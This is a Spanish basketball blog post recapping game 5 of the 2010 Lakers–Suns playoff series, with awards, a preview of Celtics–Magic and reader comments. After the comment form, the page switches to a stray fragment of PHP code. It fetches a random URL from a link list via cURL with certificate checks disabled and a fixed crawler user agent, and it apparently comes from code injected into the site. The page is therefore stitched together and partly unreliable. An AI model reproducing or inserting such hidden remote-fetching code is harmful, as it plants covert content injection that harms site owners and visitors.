Playoffs 27/05/2010: Las manos de Dios

28 de May de 2010 por TheDeerHunter

3,5 segundos para el final. Empate a 101 en el marcador. Momento de Kobe y de no ser por ese concepto casi religioso en L.A. no les llegaba la camisa al cuello.

Justo un instante antes Richardson había anotado el triple para empatar, tras haber fallado los Suns dos seguidos con sus consiguientes rebotes ofensivos cedidos por el equipo local. Los campeones habían perdido una buena ventaja, otra vez frente a la zona, otra vez defendiendo el pick and roll como si no lo hubieran visto nunca antes. Había llegado el partido anotador de Nash, que anunció algún compañero en este mismo blog hace pocos días. Gasol terminaba de fallar un mate para acabar con el partido, y antes de eso Artest había fallado dos lanzamientos abiertos en una jugada resuelta de forma absurda. Malos presagios frente al karma de Phil Jackson.

Así que llegaba otra vez el momento de la verdad y los Suns preparaban sus ungüentos para la picadura de la Mamba. Todo el estadio conocía de antemano la jugada y Gentry no era una excepción. El balón le llegó a Kobe pero no puedo esquivar el “double team” que le cayó encima. Lanzamiento forzadísimo… y “air ball”. Ahí estaba la suerte de la eliminatoria.

Pero en eso, Ron Artest, el villano de la noche con un 1 de 8 hasta ese momento, se lanzó a por el rebote como si fuera su propia alma la que estaba encerrada en ese esférico perdido. Se lo quitó de las manos a Richardson cuando ya era suyo y lo colocó sobre el tablero, que en ese preciso instante se iluminaba de rojo. La gravedad hizo el resto. De villano a héroe en un único instante, así de increíbles son los playoffs. Ahora sí puede hablar Stat sobre la suerte de los campeones.

Pero más allá de lo azaroso del asunto, los Suns necesitaron anoche 15 lanzamientos menos que Lakers para alcanzar los mismos guarismos. En el resto de apartados estadísticos fueron inferiores o muy inferioses. Es sorprendente que con, posiblemente el mejor pívot zonal de toda la NBA, para más inri europeo, Phil Jackson tenga problemas de atacar una zona tan básica como la de los Suns. Como también es sorprendente la facilidad con la que implementan estos el bloqueo y continuación… como si el viejo gurú se hubiera olvidado ya de Malone y Stockton.

La serie vuelve a Arizona, donde habría que remontarse a los años de Shaq para encontrar una victoria angelina en postemporada allí. Si no logran resolver estos aspectos a buen seguro que volveremos al Staples.

PREMIOS

MVP: Kobe Bryant rozando el triple doble con 30 puntos, 11 rebotes, 9 asistencias… no estuvo fino en los tiros, como tampoco en el decisivo, pero fue un perro de presa defensivo aportando además 4 tapones.

La sorpresa: 22 puntos fundamentales de Fisher, algunas de sus canastas en los momentos más calientes. Otra gran sorpresa es que Vujacic entró en lugar de un Shannon Brown que está naufragando en esta serie. Lo más fuerte de todo es que no lo hizo nada mal.

La decepción: Ron Artest personaliza este apartado. Fue la decepción de su equipo incluído un triple descerebrado tras rebote ofensivo cuando faltaba menos de un minuto para terminar y con ventaja en el marcador. Mayor decepción significó para los Suns que pescara en ese río revuelto que fueron los últimos 3 segundos. A ver cómo se recuperan del palo.

El mayor esfuerzo en vano: El mejor partido de Nash en la serie. Un maestro y un ídolo más allá de los colores. La NBA le debe un anillo y todavía estamos a tiempo de ver ajustar esa cuenta.

Y MAÑANA…

¿Puede haber un partido más emocionante que el que esta noche jugarán en Boston Celtics y Magic? Los verdes quieren cerrar la eliminatoria después de 2 intentos fallidos y contarán finalmente con Kendrick Perkins al que la NBA ha perdonado una de las dos técnicas que le pitaron durante el anterior partido. Y yo que pensaba que estas cosas solo pasaban en España… De todas maneras Glen Davis y Rasheed Wallace andan tocados por lo que el juego interior céltico puede sufrir de lo lindo ante Howard. Enfrente unos Magic repletos de moral y con la convicción de que si ganan este partido, llegarán a la final y entrarán en la historia de la liga como el primer equipo en remontar un 0-3 en contra.

Comenta

5 comentarios a esta entrada

  1. pcerezo dice:
    #1

    Me recordó al triple de Horry…(salvando las distancias)….

      Citar

  2. MagicJohnson32 dice:
    #2

    Vaya final más absurdo, sobre todo el triple de Artest tras el rebote ofensivo de Pau. Pa matarlo. Menuda mirada le echa Phil en el tiempo muerto posterior, jojo.

    Y la jugada que acaba con el triple a tabla de J-Rich me recordo taaaaaaaaaaanto a la del quinto partido de la serie entre ambos equipos en 2006, la del triple de Tim Thomas… buf ¡¡menos mal que apareció la mano de dios!!

      Citar

  3. Txusma dice:
    #3

    Antes del triple de Jason Richardson el festival Nash en los últimos minutos es de órdago. Llega a meter él el triple y hay q sacarlo a hombros de la plaza.
    Por cierto, si yo fuera aficionado amarillo me entrarían ganas de pegarle un buen capón a Gasol. Como se puede fallar ese mate?

      Citar

  4. MagicJohnson32 dice:
    #4

    Ese mate casi cuesta el partido y le costó el triple-doble a Kobe ¡Indignado me encuentro! 😀

      Citar

  5. TheDeerHunter dice:
    #5

    Qué queréis que os diga
    No lo falló sólo. Se podría sacar mucha punta a esa jugada… como a su 4ª falta dando dos tapones seguidos, o la faltita que le pitan a Fisher a entrada de Nash en el último cuarto…

    Yo no voy a decir nada por si aparece mestre y me acusa de confabulator… XD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>